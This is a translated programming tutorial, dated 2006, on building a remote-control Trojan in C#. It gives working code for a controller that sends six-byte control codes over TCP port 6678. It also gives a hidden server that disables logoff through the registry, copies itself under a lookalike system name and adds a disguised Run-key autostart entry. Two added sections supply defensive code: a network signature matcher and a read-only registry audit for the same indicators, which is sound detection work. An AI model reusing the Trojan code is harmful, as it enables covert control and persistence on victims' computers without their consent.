Using C# to implement a Trojan horse program

Source: Internet
Author: User

Title: Use C# to realize a Trojan program. Time: 2006-8-6. Source: Unknown.

Trojan Introduction

Because this article explores the Trojan horse program, some basic knowledge of Trojans is introduced first. A complete Trojan system consists of a hardware part, a software part and a concrete connection part. Here mainly the software part is introduced; it consists of the control program, the Trojan program (the background service program) and the Trojan preparation program. The control end is used to remotely control the service end; the Trojan program is the program that dives into the service end and obtains its operating authority; the Trojan preparation program sets the Trojan program's port number, trigger condition, Trojan name and so on, so that it hides better on the service end.

Technology used:

The control program sends control codes to control the server; the server runs in the background and modifies the registry to achieve the control purpose. The technique is not difficult; it mainly exercises C# network programming and registry modification.

Control-side development:

The control end sends a control code to the server; the service end (the Trojan program) receives the control code and, according to the control request, completes the specified work, then returns a success message when the work is done.

The control codes themselves can be defined as you like and need no detailed description; the key problems are the following.

1. Connection request

The connection uses the .NET class System.Net.Sockets.TcpClient, whose constructor is

TcpClient(string hostname, int port)

hostname is the host name to be controlled; an IP address can also be used. port is the port number. System.EventArgs is the base class for classes that contain event data.

private void button7_Click(object sender, System.EventArgs e)
{
    // Log the operation by appending it to the RichTextBox control
    richTextBox1.AppendText("Request connection " + textBox1.Text + "\r");
    int port = 6678;
    try
    {
        // Initialize a new instance of TcpClient and connect to the specified port on the specified host
        client = new TcpClient(textBox1.Text, port);
    }
    catch
    {
        MessageBox.Show("The server is not online! Check whether the host name was entered.");
        richTextBox1.AppendText("The server is not online! Check whether the host name was entered.");
    }
} // private void button7_Click
2. Test whether the controlled machine is connected. The program sends a control code and checks whether the controlled side reacts; if something is returned, "control success" is displayed. A NetworkStream provides the data stream for network access:

private NetworkStream stream;

The code is as follows:

private void button8_Click(object sender, System.EventArgs e)
{
    // Log the operation
    richTextBox1.AppendText("Test connection" + "\r");
    try
    {
        stream = client.GetStream();
        if (stream.CanWrite)
        {
            // Send the control code (lower case, matching the server's switch statement)
            string control = "jiance";
            byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
            stream.Write(by, 0, by.Length);
            // Flush so the stream is clear for the next use
            stream.Flush();
            // Start a thread that receives the returned data;
            // Receive is the function the thread executes, see the analysis below
            threadReceive = new Thread(new ThreadStart(Receive));
            threadReceive.Start();
        }
    }
    catch (Exception ee)
    {
        richTextBox1.AppendText(ee.Message + "\r");
        MessageBox.Show(ee.Message);
    }
}
3. Sending the control code

private void button9_Click(object sender, System.EventArgs e)
{
    // Choose the control code to be sent; the RadioButtons are form controls
    if (radioButton1.Checked) { control = Form2.zhucex; }
    else if (radioButton2.Checked) { control = Form3.zhuces; }
    else if (radioButton3.Checked) { control = warring; }
    else if (radioButton4.Checked) { control = suggest; }
    else if (radioButton5.Checked) { control = Form4.mumawe; }
    else if (radioButton6.Checked) { control = drop; }
    if (control == "000000")
    {
        MessageBox.Show("You did not enter any control target!");
        richTextBox1.AppendText("You did not enter any control target!");
    }
    else if (control != "000000")
    {
        try
        {
            // Log the action
            richTextBox1.AppendText(control + " is being attempted, waiting for a response ..." + "\r");
            stream = client.GetStream();
            if (stream.CanWrite)
            {
                byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
                stream.Write(by, 0, by.Length);
                stream.Flush();
                threadReceive = new Thread(new ThreadStart(Receive));
                threadReceive.Start();
            } // end if
        } // try
        catch
        {
            richTextBox1.AppendText("Server not connected, control invalid!" + "\r");
            MessageBox.Show("Server not connected, control invalid!" + "\r");
        }
    } // else if
}
4. The function the thread executes

private void Receive()
{
    // Buffer for the data to be read
    byte[] bb = new byte[3];
    // Read 3 bytes; i is the actual number of bytes read
    int i = stream.Read(bb, 0, 3);
    // Convert to a string; if Chinese control codes are used, use instead:
    // string ss = System.Text.Encoding.Unicode.GetString(bb);
    string ss = System.Text.Encoding.ASCII.GetString(bb);
    // Return codes I set on the server: HJC for connection success, Hkz for control success
    if (ss == "HJC")
    {
        MessageBox.Show("Connected successfully");
        richTextBox1.AppendText("Connected successfully");
    }
    if (ss == "Hkz")
    {
        richTextBox1.AppendText(control + " controlled successfully" + "\r");
        MessageBox.Show(control + " controlled successfully" + "\r");
    }
}


Service-Side development:

To implement the Trojan service program, the following functions are mainly needed: running in the background (hiding technique), receiving the control code, and changing the registry. These three aspects are introduced below:

1. In Visual C# it is easy to build a background service program. First create a new C# Windows application; the project name is up to you (but, in order to hide, use something similar to a system name). Set the form's "ShowInTaskbar" property to False so that it runs without showing in the taskbar, and set the "WindowState" property to Minimized so that the form is hidden while running. You can also set these in InitializeComponent(); this function runs during initialization, before the form is displayed. The code is as follows:

private void InitializeComponent()
{
    //
    // Form1
    //
    // Starting position and size of the form
    this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
    this.ClientSize = new System.Drawing.Size(368, 357);
    // Form name
    this.Name = "Form1";
    // Set the properties that make it run in the background
    this.ShowInTaskbar = false;
    this.Text = "Form1";
    this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}
2. Receiving the control code must begin as soon as the service program starts, so the listening thread must be started during program initialization; it is therefore placed in the form's constructor. The annotated code is as follows:

public Form1() // form constructor
{
    //
    // Required for Windows Forms Designer support
    //
    InitializeComponent();

    //
    // TODO: Add any constructor code after the InitializeComponent call
    //
    // Add the listening code here.
    // The port can be chosen freely; I use a fixed port
    int port = 6678;
    // System.Net.Sockets.TcpListener listens for connections from TCP network clients
    listener = new TcpListener(port);
    // Start listening
    listener.Start();
    // Start a thread that receives the control code; to stop the thread, Thread.Abort() can be used.
    // ReControlCode is the function the thread executes; it chooses the appropriate
    // registry-modification function according to the received control code
    Thread thread = new Thread(new ThreadStart(ReControlCode));
    thread.Start();
}
The ReControlCode function is as follows (for the complete code see the program):

private void ReControlCode()
{
    // Set up the receiving socket; listener.AcceptSocket() returns the socket of the accepted client request
    socket = listener.AcceptSocket();
    // Runs while the connection is established
    while (socket.Connected)
    {
        // Receive the control code
        byte[] by = new byte[6];
        int i = socket.Receive(by, by.Length, 0);
        string ss = System.Text.Encoding.ASCII.GetString(by);
        // Perform different functions according to the control code;
        // the registry-modifying code is added here
        switch (ss)
        {
            case "jiance": // test connection, return test information
                string str = "HJC";
                byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
                socket.Send(bytee, 0, bytee.Length, 0);
                break;
            case "zx1000":
                // Registry modification function, self-defined, see the analysis below
                Unlogoff();
                // Return the control message
                RetMessage();
                break;
            case "zx0100":
                // Registry modification function
                Unclose();
                // Return the control message
                RetMessage();
                break;
            // The remaining cases repeat the same pattern and are omitted here
            default:
                break;
        } // switch
    } // while
} // private void ReControlCode
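The exchange above, seen from a defender's network sensor: this added example is not part of the original article. It scores a captured TCP session against the protocol facts the article states (the fixed port 6678, six-byte ASCII control codes such as jiance, zx1000 and zx0100, and the three-byte replies HJC and Hkz). The class and method names, the scoring weights and the sample sessions are my own constructions.

```csharp
// Added example, not from the original article: a signature matcher for the
// control protocol described above. Protocol facts (port 6678, 6-byte ASCII
// control codes, 3-byte replies "HJC"/"Hkz") come from the article; the sessions
// in Main are constructed test data and all names here are assumptions.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

public static class TrojanProtocolDetector
{
    // Control codes and replies named in the article's server switch statement.
    static readonly HashSet<string> KnownControlCodes =
        new HashSet<string>(StringComparer.Ordinal) { "jiance", "zx1000", "zx0100" };
    static readonly HashSet<string> KnownReplies =
        new HashSet<string>(StringComparer.Ordinal) { "HJC", "Hkz" };

    public const int DefaultPort = 6678;

    // One TCP payload as captured, with its direction relative to the listening service.
    public sealed class Segment
    {
        public bool ToServer;
        public byte[] Payload;
    }

    // The server reads exactly 6 bytes per command, so a client payload of exactly
    // 6 printable ASCII bytes has the right shape; membership in the known set is stronger.
    public static bool IsControlCodeShape(byte[] p) =>
        p != null && p.Length == 6 && p.All(b => b >= 0x20 && b < 0x7f);

    public static bool IsKnownControlCode(byte[] p) =>
        IsControlCodeShape(p) && KnownControlCodes.Contains(Encoding.ASCII.GetString(p));

    public static bool IsKnownReply(byte[] p) =>
        p != null && p.Length == 3 && KnownReplies.Contains(Encoding.ASCII.GetString(p));

    // Score a session: a 6-byte request immediately answered by a known 3-byte reply is
    // the strongest indicator; the port alone is weak, since any service may use it.
    public static int Score(int serverPort, IList<Segment> session)
    {
        int score = serverPort == DefaultPort ? 1 : 0;
        for (int i = 0; i < session.Count; i++)
        {
            Segment s = session[i];
            if (!s.ToServer) continue;
            if (IsKnownControlCode(s.Payload)) score += 3;
            else if (IsControlCodeShape(s.Payload)) score += 1;
            bool answered = i + 1 < session.Count && !session[i + 1].ToServer;
            if (answered && IsKnownReply(session[i + 1].Payload)) score += 4;
        }
        return score;
    }

    public static string Verdict(int score) =>
        score >= 7 ? "MATCH" : score >= 3 ? "SUSPICIOUS" : "CLEAN";

    static Segment Seg(bool toServer, string ascii) =>
        new Segment { ToServer = toServer, Payload = Encoding.ASCII.GetBytes(ascii) };

    public static void Main()
    {
        // Constructed sessions: the article's connection test, one registry command,
        // and an HTTP request for contrast.
        var sessions = new Dictionary<string, (int port, List<Segment> segs)>
        {
            ["test"] = (6678, new List<Segment> { Seg(true, "jiance"), Seg(false, "HJC") }),
            ["cmd"]  = (6678, new List<Segment> { Seg(true, "zx1000"), Seg(false, "Hkz") }),
            ["http"] = (80, new List<Segment> { Seg(true, "GET / HTTP/1.1\r\n\r\n"),
                                                Seg(false, "HTTP/1.1 200 OK\r\n") }),
        };
        foreach (var kv in sessions)
        {
            int score = Score(kv.Value.port, kv.Value.segs);
            Console.WriteLine($"{kv.Key}: score={score} verdict={Verdict(score)}");
        }
    }
}
```

The first two constructed sessions score 8 (MATCH) and the HTTP session scores 0 (CLEAN). The matcher assumes one command per TCP segment, which holds for the article's code because the server reads a fixed 6 bytes per command; a sensor that reassembles streams would need to split the byte stream into 6-byte units before applying the same checks.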

3. C# implements registry modification through the .NET class library, which provides two kinds of classes: classes that handle events raised by the operating system and classes that operate on the system registry (the Microsoft.Win32 namespace). Their use is shown below. Here I wrote a subroutine that modifies the registry to make the computer unable to log off. From knowledge of the registry: under the subkey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, setting the value NoLogoff to 1 makes the computer unable to log off. The following function uses C# to implement the modification:

private void Unlogoff()
{
    // Get the top-level registry node of the host
    Microsoft.Win32.RegistryKey rlocal = Registry.LocalMachine;
    // Variable for the registry subkey (null until opened, so the check below is valid)
    RegistryKey key1 = null;
    try
    {
        // RegistryKey.OpenSubKey(string name, bool writable) retrieves the specified subkey;
        // name is the user-specified subkey, writable must be true to modify (the default, false, is read-only)
        key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", true);
        // Set the value name and data under the subkey
        key1.SetValue("NoLogoff", 1);
        // Close the opened subkey
        key1.Close();
        // Warning string
        mystr = mystr + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff has been modified! Please set it to 0!";
    }
    catch { }
    // If the subkey does not exist, create it
    if (key1 == null)
    {
        try
        {
            // RegistryKey.CreateSubKey(string subkey) creates the required subkey
            RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
            key2.SetValue("NoLogoff", 1);
            key2.Close();
            mystr = mystr + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff has been modified! Please set it to 0!";
        }
        catch { }
    }
}
4. Another important function of a Trojan program is self-replication and relocation. Once introduced into the controlled host, the Trojan must automatically hide itself in the System or System32 directory to avoid discovery. The code for the transfer is analyzed below; its main job is to move the Trojan program from the D drive to C:\winnnt\system\msdoss.exe, renaming it at the same time. The .NET namespace used is System.IO, which allows synchronous and asynchronous reading and writing of data streams and files; here the System.IO.File class is used.

private void MoveCC1()
{
    try
    {
        // File.Move(string sourceFileName, string destFileName) moves a file;
        // sourceFileName is the file to be moved, destFileName the new path of the file
        File.Move("C:\\winnnt\\system\\msdoss.exe", "D:\\winnt\\system32\\expleror.exe");
    }
    catch { }
    // Set the moved Trojan to start automatically; the analysis is the same as before
    try
    {
        key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        key1.SetValue("Microsoftt", "D:\\winnt\\system32\\expleror.exe");
        key1.Close();
    }
    catch { }
    if (key1 == null)
    {
        try
        {
            RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
            // The newly created key2 is used here (the original text wrote key1 by mistake)
            key2.SetValue("Microsoftt", "D:\\winnt\\system32\\expleror.exe");
            key2.Close();
        }
        catch { }
    }
} // MoveCC1()
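As an added example that is not part of the original article, the following read-only audit checks a host for the two registry changes described in sections 3 and 4 above: the NoLogoff policy value and the Run-key autostart entry. The key paths and the value names NoLogoff and Microsoftt come from the article; the class and method names, the name-imitation heuristic and its thresholds are assumptions of my own. It targets Windows and uses the same Microsoft.Win32.RegistryKey API the article introduces, but opens every key read-only.

```csharp
// Added example, not from the original article: a read-only host audit for the
// registry changes the article's Unlogoff() and MoveCC1() make. Key paths and value
// names come from the article; class/method names and heuristics are assumptions.
using System;
using System.Collections.Generic;
using System.IO;
using Microsoft.Win32;

public static class TrojanRegistryAudit
{
    // Paths named in the article, written here without C# string escaping.
    const string PoliciesExplorer = @"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer";
    const string RunKey = @"Software\Microsoft\Windows\CurrentVersion\Run";

    public sealed class Finding
    {
        public string Location;
        public string Detail;
        public override string ToString() => Location + ": " + Detail;
    }

    // Levenshtein distance, used to spot names that imitate a well-known name.
    public static int EditDistance(string a, string b)
    {
        var d = new int[a.Length + 1, b.Length + 1];
        for (int i = 0; i <= a.Length; i++) d[i, 0] = i;
        for (int j = 0; j <= b.Length; j++) d[0, j] = j;
        for (int i = 1; i <= a.Length; i++)
            for (int j = 1; j <= b.Length; j++)
            {
                int cost = a[i - 1] == b[j - 1] ? 0 : 1;
                d[i, j] = Math.Min(Math.Min(d[i - 1, j] + 1, d[i, j - 1] + 1), d[i - 1, j - 1] + cost);
            }
        return d[a.Length, b.Length];
    }

    // "Microsoftt" and "expleror" are close to, but not equal to, the names they imitate.
    public static bool LooksLikeImitation(string candidate, string genuine)
    {
        int dist = EditDistance(candidate.ToLowerInvariant(), genuine.ToLowerInvariant());
        return dist > 0 && dist <= 2;
    }

    // Run values are command lines: a quoted path, or a bare path followed by arguments.
    public static string ExtractExecutablePath(string commandLine)
    {
        string s = commandLine.Trim();
        if (s.StartsWith("\""))
        {
            int end = s.IndexOf('"', 1);
            return end > 0 ? s.Substring(1, end - 1) : s.Substring(1);
        }
        int exe = s.IndexOf(".exe", StringComparison.OrdinalIgnoreCase);
        return exe >= 0 ? s.Substring(0, exe + 4) : s;
    }

    // NoLogoff = 1 is the effect of the article's Unlogoff(); any non-zero value is reported.
    public static IEnumerable<Finding> CheckNoLogoff(RegistryKey hive)
    {
        using (RegistryKey key = hive.OpenSubKey(PoliciesExplorer, false))
        {
            if (key == null) yield break;
            if (key.GetValue("NoLogoff") is int v && v != 0)
                yield return new Finding { Location = hive.Name + @"\" + PoliciesExplorer,
                                           Detail = "NoLogoff = " + v + " (Log Off disabled)" };
        }
    }

    // Heuristics taken from what the article's MoveCC1() leaves behind: a value name that
    // imitates "Microsoft", a target that imitates "explorer", or a target that is missing.
    public static IEnumerable<Finding> CheckRunEntries(RegistryKey hive, Func<string, bool> fileExists)
    {
        using (RegistryKey key = hive.OpenSubKey(RunKey, false))
        {
            if (key == null) yield break;
            foreach (string name in key.GetValueNames())
            {
                string command = key.GetValue(name) as string ?? "";
                string exe = ExtractExecutablePath(command);
                var reasons = new List<string>();
                if (LooksLikeImitation(name, "Microsoft"))
                    reasons.Add("value name imitates 'Microsoft'");
                if (LooksLikeImitation(Path.GetFileNameWithoutExtension(exe), "explorer"))
                    reasons.Add("file name imitates 'explorer'");
                if (exe.Length > 0 && !fileExists(exe))
                    reasons.Add("target file is missing");
                if (reasons.Count > 0)
                    yield return new Finding { Location = hive.Name + @"\" + RunKey + @"\" + name,
                                               Detail = command + " -> " + string.Join("; ", reasons) };
            }
        }
    }

    public static int Main()
    {
        var findings = new List<Finding>();
        // The article writes HKLM; the same Run key also exists under HKCU, so both are checked.
        foreach (RegistryKey hive in new[] { Registry.LocalMachine, Registry.CurrentUser })
        {
            findings.AddRange(CheckNoLogoff(hive));
            findings.AddRange(CheckRunEntries(hive, File.Exists));
        }
        foreach (Finding f in findings) Console.WriteLine(f);
        Console.WriteLine(findings.Count == 0 ? "No indicators found." : findings.Count + " finding(s).");
        return findings.Count == 0 ? 0 : 1;
    }
}
```

The file-existence check is injected as a delegate so the Run-entry logic can be exercised against a fake registry or file system in a test. The imitation heuristic (edit distance 1 or 2 from a genuine name, case-insensitive) catches Microsoftt and expleror but will also flag benign near-misses, so its output is a lead for an analyst rather than a verdict; reading the keys with writable set to false keeps the audit from changing the system it inspects.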
With this, a simple C# Trojan is complete.


